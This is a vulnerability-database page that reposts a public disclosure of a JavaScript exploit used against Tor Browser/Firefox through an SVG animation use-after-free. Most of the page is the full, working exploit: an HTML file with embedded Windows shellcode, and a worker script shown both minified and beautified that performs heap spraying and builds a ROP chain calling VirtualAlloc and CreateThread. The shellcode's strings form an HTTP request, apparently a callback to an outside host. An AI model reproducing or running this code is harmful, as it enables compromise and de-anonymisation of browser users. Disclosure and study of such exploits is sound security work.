Vulners
Lucene search
Tor Browser / Firefox Remote use-after-free FBI Exploit
This is an Javascript exploit actively used against TorBrowser NOW. It
consists of one HTML and one CSS file, both pasted below and also
de-obscured. The exact functionality is unknown but it's getting access to
"VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I
had to break the "thecode" line in two in order to post, remove ' + ' in
the middle to restore it.
<html>
<head>
<script>
var thecode
='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
+
'\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190';
var worker = new Worker('cssbanner.js');
worker.postMessage(thecode);
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x90;
if (/.*Firefox/(4[7-9]|[5-9]d+|[1-9]d{2,})..*/.test(navigator.userAgent))
{
offset = 0x88; // versions 47.0 or greater
}
var $ = function(id) { return document.getElementById(id); }
var exploit = function()
{
var u32 = new Uint32Array(block80)
u32[0x2] = arrBase - offset;
u32[0x8] = arrBase - offset;
u32[0xE] = arrBase - offset;
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
for(i = 0; i < heap80.length/2; i++)
{
heap80[i] = block80.slice(0)
}
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')
for(i = heap80.length/2; i < heap80.length; i++)
{
heap80[i] = block80.slice(0)
}
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
window.dump('PAUSING!!! YAYA');
containerA.pauseAnimations();
}
worker.onmessage = function(e)
{
worker.onmessage = function(e)
{
window.setTimeout(function()
{
worker.terminate();
document.body.innerHTML = '';
document.getElementsByTagName('head')[0].innerHTML = '';
document.body.setAttribute('onload', '')
}, 1000);
}
arrBase = e.data;
exploit();
}
var idGenerator = function()
{
return 'id' +
(((1+Math.random())*0x10000)|0).toString(16).substring(1);
}
var craftDOM = function()
{
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idX = idGenerator();
var idA = idGenerator();
var idB = idGenerator();
var idC = idGenerator();
animateX.setAttribute('id', idX);
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('id', idB);
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('begin', '10s');
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = craftDOM;
//
</script>
<style>
#mtdiv{
position: absolute;
width: 960px;
height: 166px;
z-index: 15;
top: 100px;
left: 50%;
margin: 0 0 0 -480px;
}
</style>
</head>
<body bgcolor='#2F3236'>
<div id='mtdiv'>
<img src='mt.png'/>
</div>
</body>
<script>
setTimeout('window.location = 'member.php';', 2000);
</script>
</html>
===================================================================================================
content of "cssbanner.js":
self.onmessage = function(msg) {
thecode = msg.data;
var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
& 65535) + String.fromCharCode(a) };
function
Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;this._abs_read=function(a){a>=this._base_addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return
0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return
this.read(a)&255};this.readWord=function(a){return
this.read(a)&65535};this.readDword=function(a){return this.read(a)};
this.read=function(a,b){if(a%4){var
c=this._abs_read(a&4294967292),d=this._abs_read(a+4&4294967292),e=a%4;return
c>>>8*e|d<<8*(4-e)}return
this._abs_read(a)};this.readStr=function(a){for(var
b="",c=0;;){if(32==c)return"";var
d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return
b};this.write=function(a){}}
function PE(b,a){this.mem=b;this.export_table=this.module_base=void
0;this.export_table_size=0;this.import_table=void
0;this.import_table_size=0;this.find_module_base=function(a){for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return
this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){peFile=this.module_base+this.mem.readWord(this.module_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad
NT
Signature";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=
this.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void
0==this.import_directory&&this._resolve_pe_structures();for(var
e=this.import_directory,c=e+this.import_directory_size;e<c;){var
d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==
d.toUpperCase()){for(var
c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return
this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return
0};void 0!=a&&this.find_module_base(a)}
function ROP(b,a){this.mem=b;this.pe=new
PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var
b=0;;){for(var
e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else
break;if(e==a.length)return
this.module_base+b;b++}};this.findStackPivot=function(){return
this.findSequence([148,195])};this.findPopRet=function(a){return
this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void
0!=c?c:new ArrayBuffer(4096);
c=new Uint32Array(c);var
d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return
c}}
var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new
Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return
convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return
convu32[a]},sprayArrays=function(){for(var
b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+
o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/
8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+
(o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308);
var spr=Array(400),arrBase=805306416,ropArrBuf=new
ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new
Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u9090");sprayArrays();postMessage(arrBase);
for(memarrayloc=void 0;void
0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset<spr[i].length;offset+=512)if("object"!=typeof
spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+
o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var
mem=new Memory(memarrayloc+48,function(b){return
memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var
rop=new
ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
var backupESP=rop.findSequence([137,1,195]),ropChain=new
Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var
i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071;
ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var
j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT
SUCCESS");
};
Beautified:
self.onmessage =
function(msg) {
thecode = msg.data;
var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
& 65535) + String.fromCharCode(a) };
function Memory(b,a,f)
{
this._base_addr=b;
this._read=a;
this._write=f;
this._abs_read = function(a) {
a >= this._base_addr ? a = this._read( a - this._base_addr) : (
a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
return 0>a?4294967295+a+1:a
};
this._abs_write = function(a,b) {
a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a
= 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
};
this.readByte = function(a) {
return this.read(a) & 255
};
this.readWord = function(a) {
return this.read(a) & 65535
};
this.readDword = function(a){ return this.read(a) };
this.read = function(a,b) {
if (a%4) {
var c = this._abs_read( a & 4294967292),
d = this._abs_read( a+4 & 4294967292),
e = a%4;
return c>>>8*e | d<<8*(4-e)
}
return this._abs_read(a)
};
this.readStr = function(a) {
for(var b = "", c = 0;;) {
if (32 == c)
return "";
var d = this.readByte(a+c);
if(0 == d)
break;
b += String.fromCharCode(d);
c++
}
return b
};
this.write = function(a){}
}
function PE(b,a) {
this.mem = b;
this.export_table = this.module_base = void 0;
this.export_table_size = 0;
this.import_table = void 0;
this.import_table_size = 0;
this.find_module_base = function(a) {
for(a &= 4294901760; a; ) {
if(23117 == this.mem.readWord(a))
return this.module_base=a;
a -= 65536
}
};
this._resolve_pe_structures = function() {
peFile = this.module_base + this.mem.readWord(this.module_base+60);
if(17744 != this.mem.readDword(peFile))
throw"Bad NT Signature";
this.pe_file = peFile;
this.optional_header = this.pe_file+36;
this.export_directory =
this.module_base+this.mem.readDword(this.pe_file+120);
this.export_directory_size = this.mem.readDword(this.pe_file+124);
this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
this.import_directory_size=this.mem.readDword(this.pe_file+132)};
this.resolve_imported_function=function(a,b){
void 0==this.import_directory&&this._resolve_pe_structures();
for(var
e=this.import_directory,c=e+this.import_directory_size;e<c;){
var
d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
if(a.toUpperCase()==d.toUpperCase()){
for(var c = this.mem.readDword(e) + this.module_base,
e = this.mem.readDword(e+16) +
this.module_base,
d = this.mem.readDword(c),
f = 0 ; 0 !=d ;)
{
if(this.mem.readStr(d+this.module_base+2).toUpperCase()
== b.toUpperCase())
return this.mem.readDword(e+4*f);
f++;
d = this.mem.readDword(c+4*f)
}
break
}
e+=20
}
return 0
};
void 0!=a && this.find_module_base(a)
}
function ROP(b,a){
this.mem = b;
this.pe = new PE(b,a);
this.pe._resolve_pe_structures();
this.module_base = this.pe.module_base+4096;
this.findSequence = function(a) {
for(var b=0;;) {
for(var e=0,c=0;c<a.length;c++)
if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)
e++;
else
break;
if(e==a.length)
return this.module_base+b;
b++
}
};
this.findStackPivot=function() {
return this.findSequence([148,195])
};
this.findPopRet=function(a) {
return this.findSequence([88,195])
};
this.ropChain=function(a,b,e,c) {
c = void 0 != c ? c : new ArrayBuffer(4096);
c = new Uint32Array(c);
var d = this.findStackPivot(),
f = this.findPopRet("EAX"),
g =
this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
c[0]= f+1;
c[1]= f;
c[2]= a+b+4*e+4;
c[3]= d;
for(i=0;i<e;i++)
c[(b>>2)+i] = d;
d =(b+4>>2)+e;
c[d++]=g;
c[d++]=a+(b+4*e+28);
c[d++]=a;
c[d++]=4096;
c[d++]=4096;
c[d++]=64;
c[d++]=3435973836;
return c
}
}
var conv=new ArrayBuffer(8),
convf64=new Float64Array(conv),
convu32=new Uint32Array(conv),
qword2Double=function(b,a) {
convu32[0]=b;
convu32[1]=a;
return convf64[0]
},
doubleFromFloat = function(b,a) {
convf64[0]=b;
return convu32[a]
},
sprayArrays=function() {
for(var b=Array(262138),a=0;262138>a;a++)
b[a]=fzero;
for(a=0;a<b.length;a+=512)
b[a+1] = memory,
b[a+21] = qword2Double(0,2),
b[a+14] = qword2Double(arrBase+o1,0),
b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
b[a+(o2+0)/8] = qword2Double(2,0),
b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
b[a+(o3+0)/8] = qword2Double(16,0),
b[a+(o3+24)/8] = qword2Double(2,0),
b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
b[a+(o6+8)/8] = qword2Double(2,0),
b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
b[a+(o7+16)/8] = qword2Double(0,4026531840),
b[a+(o7+32)/8] = qword2Double(0,3220176896),
b[a+(o7+48)/8] = qword2Double(2,0),
b[a+(o7+56)/8] = qword2Double(1,0),
b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
b[a+(o7+168)/8] = qword2Double(0,2),
b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
b[a+(o10+0)/8] = qword2Double(2,0),
b[a+(o10+8)/8] = qword2Double(0,268435456),
b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
b[a+(o11+16)/8] = qword2Double(0,4026531840),
b[a+(o11+32)/8] = qword2Double(0,3220176896),
b[a+(o11+48)/8] = qword2Double(2,0),
b[a+(o11+56)/8] = qword2Double(1,0),
b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
b[a+(o11+168)/8] = qword2Double(0,2);
for(a=0;a<spr.length;a++)
spr[a]=b.slice(0)
}, vtable_offset=300;
/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
vtable_offset=304 :
/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)
&& (vtable_offset=308);
var spr=Array(400),
arrBase=805306416,
ropArrBuf=new ArrayBuffer(4096),
o1=176,
o2=256,
o3=768,
o4=832,
o5=864,
o6=928,
o7=1024,
o8=1280,
o9=1344,
o10=1376,
o11=1536,
oRop=1792,
memory=new Uint32Array(16),
len=memory.length,
arr_index=0,
arr_offset=0;
fzero=qword2Double(0,0);
0!=thecode.length%2&&(thecode+="\u9090");
sprayArrays();
postMessage(arrBase);
for(memarrayloc=void 0;void 0==memarrayloc;)
for(i=0;i<spr.length;i++)
for(offset=0;offset<spr[i].length;offset+=512)
if("object" != typeof spr[i][offset+1]) {
memarrayloc=doubleFromFloat(spr[i][offset+1],0);
arr_index=i;
arr_offset=offset;
spr[i][offset+(o2+0)/8]=qword2Double(65,0);
spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);
for(j=0;33>j;j++)
spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);
spr[i][offset+(o3+8)/8]=qword2Double(0,0);
spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);
spr[i][offset+(o7+168)/8]=qword2Double(0,3);
spr[i][offset+(o7+88)/8]=qword2Double(0,2);
break
}
for(;memory.length==len;);
var mem=new Memory(memarrayloc+48,
function(b){return memory[b/4]},
function(b,a){memory[b/4]=a}),
xulPtr=mem.readDword(memarrayloc+12);
spr[arr_index][arr_offset+1]=ropArrBuf;
ropPtr=mem.readDword(arrBase+8);
spr[arr_index][arr_offset+1]=null;
ropBase=mem.readDword(ropPtr+16);
var rop=new ROP(mem,xulPtr);
rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
var backupESP=rop.findSequence([137,1,195]), ropChain=new Uint32Array(ropArrBuf);
ropChain[0]=backupESP;
CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");
for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
ropChain[i++]=3296825488;
ropChain[i++]=2048;
ropChain[i++]=1347469361;
ropChain[i++]=1528949584;
ropChain[i++]=3092271187;
ropChain[i++]=CreateThread;
ropChain[i++]=3096498431;
ropChain[i++]=arrBase+16;
ropChain[i++]=1955274891;
ropChain[i++]=280697892;
ropChain[i++]=704643071;
ropChain[i++]=2425406428;
ropChain[i++]=4294957800;
ropChain[i++]=2425393407;
for (var j=0;j<thecode.length;j+=2)
ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);
spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
spr[arr_index][arr_offset+3]=qword2Double(0,256);
spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
postMessage("GREAT SUCCESS");
};
References:
https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html
https://www.kb.cert.org/vuls/id/791496
# 0day.today [2018-03-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2016 00:00Current
7.1High risk
Vulners AI Score7.1